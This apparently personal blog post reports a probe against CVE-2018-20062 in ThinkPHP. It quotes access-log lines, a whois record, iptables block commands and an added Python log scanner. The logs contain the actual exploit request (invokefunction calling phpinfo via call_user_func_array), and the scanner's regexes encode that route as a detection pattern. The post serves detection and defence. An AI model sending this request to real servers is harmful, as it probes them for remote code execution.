Security hole in NoneCMS ThinkPHP: /TP/public/index.php

I have just seen in my logs an attempt to use the vulnerability CVE-2018-20062.

In the logs it looks like this:

121.5.155.158 - - [13/Oct/2021:07:16:18 +0200] "GET /TP/public/index.php HTTP/1.1" 302 403 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
121.5.155.158 - - [13/Oct/2021:07:16:19 +0200] "GET /user/auth/login HTTP/1.1" 200 8190 "http://80.15.48.50/TP/public/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
121.5.155.158 - - [13/Oct/2021:07:16:19 +0200] "GET /TP/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 302 403 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
121.5.155.158 - - [13/Oct/2021:07:16:20 +0200] "GET /user/auth/login HTTP/1.1" 200 8187 "http://80.15.48.50/TP/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
121.5.155.158 - - [13/Oct/2021:07:16:20 +0200] "POST /TP/public/index.php?s=captcha HTTP/1.1" 302 215 "-" "Go-http-client/1.1"
121.5.155.158 - - [13/Oct/2021:07:16:21 +0200] "GET /user/auth/login HTTP/1.1" 200 8189 "http://80.15.48.50/TP/public/index.php?s=captcha" "Go-http-client/1.1"
121.5.155.158 - - [13/Oct/2021:07:16:22 +0200] "GET / HTTP/1.1" 302 406 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
121.5.155.158 - - [13/Oct/2021:07:16:22 +0200] "GET /user/auth/login HTTP/1.1" 200 8190 "http://80.15.48.50:80" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"

The IP address 121.5.155.158 is in China:

route:          121.4.0.0/15
origin:         AS45090
descr:          China Internet Network Information Center
                Floor1, Building No.1 C/-Chinese Academy of Sciences
                4, South 4th Street
                Haidian District,
mnt-by:         MAINT-CNNIC-AP
last-modified:  2020-02-25T01:14:09Z
source:         APNIC

The best thing to do is therefore:

# iptables -A INPUT -s 121.5.155.158 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4
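To spot this kind of burst without reading the access log by hand, here is an added example (not from the original post): a small Python script that parses Apache combined-log lines, URL-decodes the request target, flags the ThinkPHP invokefunction route and the companion POST to s=captcha seen above, and emits the iptables DROP line from the post for each offending IP. The sample lines are constructed from the entries quoted above, with shortened user agents.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample: three of the combined-log lines quoted in the post (shortened UAs)
# plus one benign ThinkPHP-style request. Apache writes a backslash as "\\" in the log.
SAMPLE_LOG = r'''121.5.155.158 - - [13/Oct/2021:07:16:18 +0200] "GET /TP/public/index.php HTTP/1.1" 302 403 "-" "Mozilla/5.0"
121.5.155.158 - - [13/Oct/2021:07:16:19 +0200] "GET /TP/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 302 403 "-" "Mozilla/5.0"
121.5.155.158 - - [13/Oct/2021:07:16:20 +0200] "POST /TP/public/index.php?s=captcha HTTP/1.1" 302 215 "-" "Go-http-client/1.1"
203.0.113.7 - - [13/Oct/2021:07:20:00 +0200] "GET /index.php?s=/article/view/id/12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
'''

# Apache "combined" format: ip ident user [ts] "METHOD target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"')

# (rule name, HTTP methods it applies to, pattern matched against the decoded, lowercased target)
RULES = (
    # ThinkPHP controller-invocation route abused by CVE-2018-20062 (the GET in the post);
    # "\\+" tolerates one or more backslashes, so "%5C", "\" and "\\" all match.
    ("thinkphp-invokefunction", {"GET", "POST"},
     re.compile(r'[?&]s=.*think\\+app/invokefunction|function=call_user_func_array')),
    # Companion probe seen in the same burst: a POST against the captcha route.
    ("thinkphp-captcha-post", {"POST"}, re.compile(r'[?&]s=captcha(&|$)')),
)


def analyse(log_text):
    """Return (hits, per_ip): one dict per suspicious request, and a Counter of hits per IP."""
    hits, per_ip = [], Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-log line; skip rather than guess
        # Undo percent-encoding and Apache's doubled backslashes before matching.
        target = unquote(m["target"]).replace("\\\\", "\\").lower()
        for name, methods, pattern in RULES:
            if m["method"] in methods and pattern.search(target):
                hits.append({"ip": m["ip"], "ts": m["ts"], "rule": name, "ua": m["ua"]})
                per_ip[m["ip"]] += 1
                break
    return hits, per_ip


def block_rules(per_ip, threshold=1):
    """Emit the iptables DROP line used in the post for every IP with >= threshold hits."""
    return [f"iptables -A INPUT -s {ip} -j DROP" for ip, n in sorted(per_ip.items()) if n >= threshold]


if __name__ == "__main__":
    found, counts = analyse(SAMPLE_LOG)
    for h in found:
        print(f"{h['ts']} {h['ip']} {h['rule']} ua={h['ua']!r}")
    print("\n".join(block_rules(counts)))
```

Feed it a real access log with analyse(open(path).read()) and review the DROP lines before applying them, since a shared proxy or scanner IP may warrant a different response than a blanket block.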


On to the next one …
